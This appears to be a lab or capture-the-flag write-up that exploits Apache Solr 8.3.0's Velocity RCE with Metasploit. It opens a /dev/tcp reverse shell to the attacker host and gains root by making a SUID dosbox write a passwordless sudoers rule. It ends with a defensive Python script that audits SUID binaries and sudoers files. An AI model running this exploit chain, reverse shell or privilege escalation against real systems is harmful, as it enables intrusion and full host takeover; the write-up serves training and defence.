Eclipse

This report details the exploitation of a Remote Code Execution (RCE) vulnerability in Apache Solr 8.3.0, leading to a reverse shell and subsequent privilege escalation to root using a SUID binary.

Reconnaissance

export TARGET_IP=172.17.0.2
nmap -p0- $TARGET_IP
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
8983/tcp open unknown
nmap -p 8983 -sV -sC $TARGET_IP
PORT     STATE SERVICE VERSION
8983/tcp open http Apache Solr
| http-title: Solr Admin
|_Requested resource was http://172.17.0.2:8983/solr/

Web Service Enumeration

Visiting http://172.17.0.2:8983/solr/ in a web browser reveals the Apache Solr admin panel and the specific version in use: 8.3.0.

Exploitation

A search for known exploits targeting Apache Solr 8.3.0 reveals a critical RCE vulnerability associated with the Velocity template engine, commonly referred to as solr_velocity_rce.

We use the Metasploit Framework's exploit/multi/http/solr_velocity_rce module:

msfconsole -q
search solr
use exploit/multi/http/solr_velocity_rce

Exploit Configuration

The exploit is configured with the target's IP address, the attacker's IP address and a local port for the reverse shell connection:

set RHOSTS 172.17.0.2    # Target IP address
set LHOST 172.17.0.1     # Attacker IP address
set LPORT 4444           # Local port for the reverse shell

The exploit is launched:

exploit

Result: a successful exploit returns a Meterpreter session, giving us interactive access to the target system.

Post-Exploitation

We drop from Meterpreter into a system shell on the target:

meterpreter > shell

On the attacker machine, start a second listener so that we can catch a new reverse shell and keep a usable terminal for the following commands:

nc -lvnp 4445

On the victim machine:

script /dev/null -c bash
sh -i >& /dev/tcp/172.17.0.1/4445 0>&1

Once the reverse shell connects, we upgrade it to a fully interactive TTY:

script /dev/null -c bash
# CTRL + Z
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty size
stty rows <ROWS> columns <COLUMNS>

With a working terminal, we enumerate privilege escalation vectors by searching for SUID binaries:

find / -perm -4000 2>/dev/null

Output:

...
/usr/bin/dosbox

dosbox is listed on GTFOBins (https://gtfobins.github.io/gtfobins/dosbox/). With the SUID bit set it can write files as root, which we use to drop a passwordless sudo rule into /etc/sudoers.d and then switch to root:

LFILE='/etc/sudoers.d/NINHACK'
/usr/bin/dosbox -c 'mount c /' -c "echo ninhack ALL=(ALL) NOPASSWD: ALL >c:$LFILE" -c exit
sudo su
id
> uid=0(root) gid=0(root) groups=0(root)
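From the defender's side, the two artefacts this chain leaves behind are an unexpected SUID binary (/usr/bin/dosbox) and a NOPASSWD rule dropped into /etc/sudoers.d. The following audit script is an added example, not part of this write-up; the SUID baseline it ships with is a constructed sample, and the file-mode check assumes the usual 0440 root-owned convention for sudoers.d drop-ins.

```python
"""Audit a host for the two findings above: SUID binaries outside a known
baseline, and passwordless / unrestricted sudo rules in /etc/sudoers.d."""
import re
from pathlib import Path

# Constructed baseline of expected SUID binaries; a real one is captured from
# a clean build of the same image, not hard-coded.
SUID_BASELINE = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/gpasswd",
}
# One sudoers user specification: who, host, optional (runas), command spec.
SUDO_RULE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<spec>.+)$"
)

def unexpected_suid(find_output: str, baseline=SUID_BASELINE) -> list[str]:
    """Paths from `find / -perm -4000` output that are not in the baseline."""
    found = {ln.strip() for ln in find_output.splitlines() if ln.startswith("/")}
    return sorted(found - set(baseline))

def risky_sudo_rules(sudoers_text: str) -> list[dict]:
    """Flag non-root rules that are NOPASSWD and/or grant ALL commands."""
    hits = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments / blanks
        if not line or line.startswith("Defaults"):
            continue
        m = SUDO_RULE.match(line)
        if not m or m["who"] == "root":
            continue
        nopasswd = "NOPASSWD:" in m["spec"]
        all_cmds = re.search(r"(?:^|:)\s*ALL\s*$", m["spec"]) is not None
        if nopasswd or all_cmds:
            hits.append({"who": m["who"], "nopasswd": nopasswd,
                         "all_cmds": all_cmds, "rule": line})
    return hits

def audit_sudoers_dir(directory: str = "/etc/sudoers.d") -> list[dict]:
    """Live-host check: every drop-in must be root-owned, mode 0440, and clean."""
    findings = []
    for f in sorted(Path(directory).glob("*")):
        st = f.stat()
        if st.st_uid != 0 or (st.st_mode & 0o777) != 0o440:
            findings.append({"file": str(f), "rule": "bad owner or mode"})
        for hit in risky_sudo_rules(f.read_text(errors="replace")):
            findings.append({"file": str(f), **hit})
    return findings
```

Run `audit_sudoers_dir()` as root on the host, and feed the saved `find / -perm -4000` output to `unexpected_suid` to diff it against the baseline.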